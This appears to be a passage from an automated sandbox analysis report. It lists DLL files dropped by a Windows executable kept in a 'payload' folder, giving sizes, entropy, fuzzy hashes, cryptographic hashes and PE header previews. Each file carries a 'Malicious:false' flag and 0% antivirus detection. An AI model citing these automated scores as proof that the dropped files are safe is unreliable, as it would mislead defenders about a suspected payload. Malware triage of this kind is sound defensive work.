                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...U..f.........." ..... ... ......P.....................................................`..........................................9.......9..d....`.......P..X............p..(...p2...............................2..8............0...............................text............ .................. ..`.rdata..@....0.......$..............@..@.data........@.......4..............@....pdata..X....P.......6..............@..@.rsrc........`.......:..............@..@.reloc..(....p.......<..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):14848
                                                                                                                                                                                                                                            Entropy (8bit):5.262055670423592
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:C/ZN2eq/b04PAHH41F6fnVS0sVn+5CA5Z1cD66WGcqgFjLg:vI4IHHaQfSVnCZyDImgFjLg
                                                                                                                                                                                                                                            MD5:18D2D96980802189B23893820714DA90
                                                                                                                                                                                                                                            SHA1:5DEE494D25EB79038CBC2803163E2EF69E68274C
                                                                                                                                                                                                                                            SHA-256:C2FD98C677436260ACB9147766258CB99780A007114AED37C87893DF1CF1A717
                                                                                                                                                                                                                                            SHA-512:0317B65D8F292332C5457A6B15A77548BE5B2705F34BB8F4415046E3E778580ABD17B233E6CC2755C991247E0E65B27B5634465646715657B246483817CACEB7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...V..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..|............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......."..............@..@.data........@.......0..............@....pdata..|....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..(....p.......8..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):36352
                                                                                                                                                                                                                                            Entropy (8bit):5.913843738203007
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:dspbXtHQY4ubrttQza9CHnZXQsnecAlOF0qZLAXxQI3Sya6XPpMg3Yx8MnDcCPSq:7Y44UagH6cAFCLUSYpMg3YDzPo5kG9G
                                                                                                                                                                                                                                            MD5:EF472BA63FD22922CA704B1E7B95A29E
                                                                                                                                                                                                                                            SHA1:700B68E7EF95514D5E94D3C6B10884E1E187ACD8
                                                                                                                                                                                                                                            SHA-256:66EEF4E6E0CEEEF2C23A758BFBEDAE7C16282FC93D0A56ACAFC40E871AC3F01C
                                                                                                                                                                                                                                            SHA-512:DC2060531C4153C43ABF30843BCB5F8FA082345CA1BB57F9AC8695EDDB28FF9FDA8132B6B6C67260F779D95FCADCAE2811091BCA300AB1E041FAE6CC7B50ABD8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...^..f.........." .....`...0......`.....................................................`..........................................~..|...L...d...............<...............(....q...............................q..8............p..(............................text...X^.......`.................. ..`.rdata.......p.......d..............@..@.data................x..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc..(...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):12288
                                                                                                                                                                                                                                            Entropy (8bit):4.735350805948923
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:rhsC3eqv6b0q3OQ3rHu5bc64OhD2I/p3cqgONLg:r/Hq3jHuY64OhDJJgONLg
                                                                                                                                                                                                                                            MD5:3B1CE70B0193B02C437678F13A335932
                                                                                                                                                                                                                                            SHA1:063BFD5A32441ED883409AAD17285CE405977D1F
                                                                                                                                                                                                                                            SHA-256:EB2950B6A2185E87C5318B55132DFE5774A5A579259AB50A7935A7FB143EA7B1
                                                                                                                                                                                                                                            SHA-512:0E02187F17DFCFD323F2F0E62FBFE35F326DCF9F119FC8B15066AFAEEE4EB7078184BC85D571B555E9E67A2DD909EC12D8A67E3D075E9B1283813EF274E05C0D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d...Z..f.........." ................P.....................................................`..........................................8..d....8..d....`.......P..4............p..(....1...............................1..8............0...............................text...H........................... ..`.rdata..0....0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..(....p......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22528
                                                                                                                                                                                                                                            Entropy (8bit):5.705606408072877
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:19BcRxBmau38CYIl9bhgIW0mvufueNr359/tjGGDEFSegqrA:NcRy38J+9dmvufFtaGDV
                                                                                                                                                                                                                                            MD5:FF33C306434DEC51D39C7BF1663E25DA
                                                                                                                                                                                                                                            SHA1:665FCF47501F1481534597C1EAC2A52886EF0526
                                                                                                                                                                                                                                            SHA-256:D0E3B6A2D0E073B2D9F0FCDB051727007943A17A4CA966D75EBA37BECDBA6152
                                                                                                                                                                                                                                            SHA-512:66A909DC9C3B7BD4050AA507CD89B0B3A661C85D33C881522EC9568744953B698722C1CBFF093F9CBCD6119BD527FECAB05A67F2E32EC479BE47AFFA4377362C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...\..f.........." .....6...$......P.....................................................`.........................................`Y......`Z..d............p..................(....R..............................0R..8............P...............................text...(5.......6.................. ..`.rdata.......P.......:..............@..@.data........`.......J..............@....pdata.......p.......P..............@..@.rsrc................T..............@..@.reloc..(............V..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):70656
                                                                                                                                                                                                                                            Entropy (8bit):6.0189903352673655
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:Jfju4GgRMgWWnEDZiECgd/iwOXUQdbhov0Clb8Cx4hpK8ithLFIDullRPwDHxXOa:pXRMgWiEDZiECgd/iwOXUQdbhov0ClbU
                                                                                                                                                                                                                                            MD5:F267BF4256F4105DAD0D3E59023011ED
                                                                                                                                                                                                                                            SHA1:9BC6CA0F375CE49D5787C909D290C07302F58DA6
                                                                                                                                                                                                                                            SHA-256:1DDE8BE64164FF96B2BAB88291042EB39197D118422BEE56EB2846E7A2D2F010
                                                                                                                                                                                                                                            SHA-512:A335AF4DBF1658556ED5DC13EE741419446F7DAEC6BD2688B626A803FA5DD76463D6367C224E0B79B17193735E2C74BA417C26822DAEEF05AC3BAB1588E2DE83
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...\..f.........." .........8......`........................................P............`.............................................0.......d....0....... ..$............@..(.......................................8............................................text...8........................... ..`.rdata..............................@..@.data...............................@....pdata..$.... ......................@..@.rsrc........0......................@..@.reloc..(....@......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):770560
                                                                                                                                                                                                                                            Entropy (8bit):7.613224993327352
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:XtIrHoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h:XtIrHoxJFf1p34hcrn5Go9yQO6
                                                                                                                                                                                                                                            MD5:1EFD7F7CB1C277416011DE6F09C355AF
                                                                                                                                                                                                                                            SHA1:C0F97652AC2703C325AB9F20826A6F84C63532F2
                                                                                                                                                                                                                                            SHA-256:AB45FA80A68DB1635D41DC1A4AAD980E6716DAC8C1778CB5F30CDB013B7DF6E6
                                                                                                                                                                                                                                            SHA-512:2EC4B88A1957733043BBD63CEAA6F5643D446DB607B3267FAD1EC611E6B0AF697056598AAC2AE5D44AB2B9396811D183C32BCE5A0FF34E583193A417D1C5226B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s.. .. .. ... .. ..!.. ..!.. .. .. ..!.. ..!.. ..!.. \..!.. \..!.. \.r .. \..!.. Rich.. ................PE..d...[..f.........." ................`.....................................................`.............................................h.......d...............................0......................................8...............(............................text............................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):26112
                                                                                                                                                                                                                                            Entropy (8bit):5.8551858881598795
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:BczadRwoF2MZ81n0XTyMCYIl9bhgIW0mv8aeadRcwRwftjGLD2pRQNgQQ77k:2udRf2MuMJ+9dmv8aea34taLDcfQ
                                                                                                                                                                                                                                            MD5:C5FB377F736ED731B5578F57BB765F7A
                                                                                                                                                                                                                                            SHA1:5BA51E11F4DE1CAEDEBA0F7D4D10EC62EC109E01
                                                                                                                                                                                                                                            SHA-256:32073DF3D5C85ABCE7D370D6E341EF163A8350F6A9EDC775C39A23856CCFDD53
                                                                                                                                                                                                                                            SHA-512:D361BCDAF2C700D5A4AC956D96E00961432C05A1B692FC870DB53A90F233A6D24AA0C3BE99E40BD8E5B7C6C1B2BCDCDCFC545292EF321486FFC71C5EA7203E6A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...]..f.........." .....B...&......P.....................................................`..........................................i..0....k..d...............................(... b..............................@b..8............`...............................text....A.......B.................. ..`.rdata..P....`.......F..............@..@.data........p.......V..............@....pdata...............^..............@..@.rsrc................b..............@..@.reloc..(............d..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):84992
                                                                                                                                                                                                                                            Entropy (8bit):6.064677498000638
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:BrYNvxcZeLrIeNs2qkTwe57DsuP45PqAqVDK9agdUiwOXyQdDrov0slb8gx4TBKW:Br4vxcZeLrIeN1TvHsuP45yAqVDK9ag3
                                                                                                                                                                                                                                            MD5:8A0C0AA820E98E83AC9B665A9FD19EAF
                                                                                                                                                                                                                                            SHA1:6BF5A14E94D81A55A164339F60927D5BF1BAD5C4
                                                                                                                                                                                                                                            SHA-256:4EE3D122DCFFE78E6E7E76EE04C38D3DC6A066E522EE9F7AF34A09649A3628B1
                                                                                                                                                                                                                                            SHA-512:52496AE7439458DEDB58A65DF9FFDCC3A7F31FC36FE7202FB43570F9BB03ABC0565F5EF32E5E6C048ED3EBC33018C19712E58FF43806119B2FB5918612299E7E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...^..f.........." .........8......`.....................................................`..........................................C..h...HE..d....p.......`..l...............(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata..l....`.......>..............@..@.rsrc........p.......H..............@..@.reloc..(............J..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10240
                                                                                                                                                                                                                                            Entropy (8bit):4.675380950473425
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:frQRpBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSztllIDpqf4AZaRcX6gnO:Qddz2KTnThIz0qfteRIDgRWcqgnCWt
                                                                                                                                                                                                                                            MD5:44B930B89CE905DB4716A548C3DB8DEE
                                                                                                                                                                                                                                            SHA1:948CBFF12A243C8D17A7ACD3C632EE232DF0F0ED
                                                                                                                                                                                                                                            SHA-256:921C2D55179C0968535B20E9FD7AF55AD29F4CE4CF87A90FE258C257E2673AA5
                                                                                                                                                                                                                                            SHA-512:79DF755BE8B01D576557A4CB3F3200E5EE1EDE21809047ABB9FF8D578C535AC1EA0277EDA97109839A7607AF043019F2C297E767441C7E11F81FDC87FD1B6EFC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...X..f.........." ................P........................................p............`.........................................@'..|....'..P....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10240
                                                                                                                                                                                                                                            Entropy (8bit):4.625428549874022
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:flipBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSzteXuDVZqYNIfcX6gHCWx:Cddz2KTnThIz0qfteR5DVwYkcqgHCWt
                                                                                                                                                                                                                                            MD5:F24F9356A6BDD29B9EF67509A8BC3A96
                                                                                                                                                                                                                                            SHA1:A26946E938304B4E993872C6721EB8CC1DCBE43B
                                                                                                                                                                                                                                            SHA-256:034BB8EFE3068763D32C404C178BD88099192C707A36F5351F7FDB63249C7F81
                                                                                                                                                                                                                                            SHA-512:C4D3F92D7558BE1A714388C72F5992165DD7A9E1B4FA83B882536030542D93FDAD9148C981F76FFF7868192B301AC9256EDB8C3D5CE5A1A2ACAC183F96C1028B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...Z..f.........." ................P........................................p............`......................................... '..t....'..P....P.......@...............`..(....!...............................!..8............ ...............................text...h........................... ..`.rdata..`.... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):119192
                                                                                                                                                                                                                                            Entropy (8bit):6.6016214745004635
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                                                                                                                                                            MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                                                                                                                                                            SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                                                                                                                                                            SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                                                                                                                                                            SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):49528
                                                                                                                                                                                                                                            Entropy (8bit):6.662491747506177
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:wPIyGVrxmKqOnA4j3z6Su77A+i0QLxi9z9Rtii9zn+:fBr87uW1nA8QLx+zrti+zn+
                                                                                                                                                                                                                                            MD5:F8DFA78045620CF8A732E67D1B1EB53D
                                                                                                                                                                                                                                            SHA1:FF9A604D8C99405BFDBBF4295825D3FCBC792704
                                                                                                                                                                                                                                            SHA-256:A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
                                                                                                                                                                                                                                            SHA-512:BA7F8B7AB0DEB7A7113124C28092B543E216CA08D1CF158D9F40A326FB69F4A2511A41A59EA8482A10C9EC4EC8AC69B70DFE9CA65E525097D93B819D498DA371
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...|!..{.&.|!..{...|!..Rich}!..................PE..d.....v..........." ...&.<...8.......B...................................................`A........................................Pm.......m..x....................r..xO......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):71448
                                                                                                                                                                                                                                            Entropy (8bit):6.263206909105092
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:BoxWhy9EQkTpR1Pg9qgTILN/86wW1lI1Onl7SyPxN3:BiWhy3k1Ra9qgTILN/Lw8lI1OnlB
                                                                                                                                                                                                                                            MD5:CC0F232F2A8A359DEE29A573667E6D77
                                                                                                                                                                                                                                            SHA1:D3FFBF5606D9C77A0DE0B7456F7A5314F420B1F7
                                                                                                                                                                                                                                            SHA-256:7A5C88CE496BAFDF31A94AE6D70B017070703BC0A7DA1DFAE7C12B21BB61030D
                                                                                                                                                                                                                                            SHA-512:48484177BF55179607D66F5A5837A35CD586E8A9FB185DE8B10865AAB650B056A61D1DC96370C5EFC6955CCB4E34B31810F8E1C8F5F02D268F565A73B4FF5657
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7_[.V1..V1..V1......V1.5.0..V1.5.2..V1.5.5..V1.5.4..V1...0..V1...0..V1..V0.qV1...<..V1...1..V1......V1...3..V1.Rich.V1.........................PE..d.....f.........." ...(.f................................................... ............`.............................................P......d......................../..............T...........................@...@............................................text...]e.......f.................. ..`.rdata..pO.......P...j..............@..@.data...p...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):85272
                                                                                                                                                                                                                                            Entropy (8bit):6.591457260071925
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:+yhz79151BVo1vXfzIFnaR4bO1AsCn8Bsjk+tI1CVQ7Sy4x+R:Nhzx15evXkuxAB8BMk+tI1CVQF
                                                                                                                                                                                                                                            MD5:DD26ED92888DE9C57660A7AD631BB916
                                                                                                                                                                                                                                            SHA1:77D479D44D9E04F0A1355569332233459B69A154
                                                                                                                                                                                                                                            SHA-256:324268786921EC940CBD4B5E2F71DAFD08E578A12E373A715658527E5B211697
                                                                                                                                                                                                                                            SHA-512:D693367565005C1B87823E781DC5925146512182C8D8A3A2201E712C88DF1C0E66E65ECAEC9AF22037F0A8F8B3FB3F511EA47CFD5774651D71673FAB612D2897
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................b....(......(......(......(......(.....................................................Rich...........PE..d......f.........." ...(.....^...............................................`............`.........................................p...H............@.......0..D......../...P..........T...........................p...@............................................text...#........................... ..`.rdata..P>.......@..................@..@.data........ ......................@....pdata..D....0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179712
                                                                                                                                                                                                                                            Entropy (8bit):6.180800197956408
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:IULjhBCx8qImKrUltSfGzdMcbb9CF8OS7jkSTLkKWlgeml:IgCeqImzSfIMcNCvOkSTLLWWem
                                                                                                                                                                                                                                            MD5:FCB71CE882F99EC085D5875E1228BDC1
                                                                                                                                                                                                                                            SHA1:763D9AFA909C15FEA8E016D321F32856EC722094
                                                                                                                                                                                                                                            SHA-256:86F136553BA301C70E7BADA8416B77EB4A07F76CCB02F7D73C2999A38FA5FA5B
                                                                                                                                                                                                                                            SHA-512:4A0E98AB450453FD930EDC04F0F30976ABB9214B693DB4B6742D784247FB062C57FAFAFB51EB04B7B4230039AB3B07D2FFD3454D6E261811F34749F2E35F04D6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......a..#%p.p%p.p%p.p,..p)p.p5.q'p.p5.zp!p.p5.q!p.p5.q-p.p5.q)p.pn..q!p.p6.q&p.p%p.p.p.pm..q!p.p,..p$p.pm..q$p.pm.xp$p.pm..q$p.pRich%p.p........................PE..d...W..f.........." ...).....B......`........................................0............`..........................................h..l....i..................T............ .......O...............................M..@............................................text............................... ..`.rdata..............................@..@.data....].......0...p..............@....pdata..T...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):125208
                                                                                                                                                                                                                                            Entropy (8bit):6.138116508461042
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:cXw32spTVYgFoj6N2xE9sb7VRf/EiZBq5syCtYPU9BI1LP885:cgGEOgFoj68ksrf/Ejsa5
                                                                                                                                                                                                                                            MD5:C8AFA1EBB28828E1115C110313D2A810
                                                                                                                                                                                                                                            SHA1:1D0D28799A5DBE313B6F4DDFDB7986D2902FA97A
                                                                                                                                                                                                                                            SHA-256:8978972CF341CCD0EDF8435D63909A739DF7EF29EC7DD57ED5CAB64B342891F0
                                                                                                                                                                                                                                            SHA-512:4D9F41BD23B62600D1EB097D1578BA656B5E13FD2F31EF74202AA511111969BB8CFC2A8E903DE73BD6E63FADAA59B078714885B8C5B8ECC5C4128FF9D06C1E56
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......f.d."..."..."...+...$....... .......&.......*...........7... ...i...#...i...$.......!..."......7...$...7...#...7...#...7...#...Rich"...........................PE..d....f.........." ...(............`_..............................................|.....`.........................................p`.......`.........................../......t.......T...............................@............................................text............................... ..`.rdata..hl.......n..................@..@.data...,5.......0...j..............@....pdata..............................@..@.rsrc...............................@..@.reloc..t...........................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257304
                                                                                                                                                                                                                                            Entropy (8bit):6.565090204799859
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:3uQjqbJrTwvqM+eYx+lDJOAkl9qWM53pLW1AcfRRR6tlISgOg:3sTwvWeS+xJw4ln7g
                                                                                                                                                                                                                                            MD5:CEA3B419C7CA87140A157629C6DBD299
                                                                                                                                                                                                                                            SHA1:7DBFF775235B1937B150AE70302B3208833DC9BE
                                                                                                                                                                                                                                            SHA-256:95B9850E6FB335B235589DD1348E007507C6B28E332C9ABB111F2A0035C358E5
                                                                                                                                                                                                                                            SHA-512:6E3A6781C0F05BB5182073CCA1E69B6DF55F05FF7CDCEA394BACF50F88605E2241B7387F1D8BA9F40A96832D04F55EDB80003F0CF1E537A26F99408EE9312F5B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V..............'.....g&......g&......g&......g&.......!.................9....!.......!.......!.......!K......!......Rich............PE..d.....f.........." ...(.....<............................................................`..........................................c..P....c...................&......./......T.......T...........................p...@............................................text...9........................... ..`.rdata..(...........................@..@.data...X*.......$...b..............@....pdata...&.......(..................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
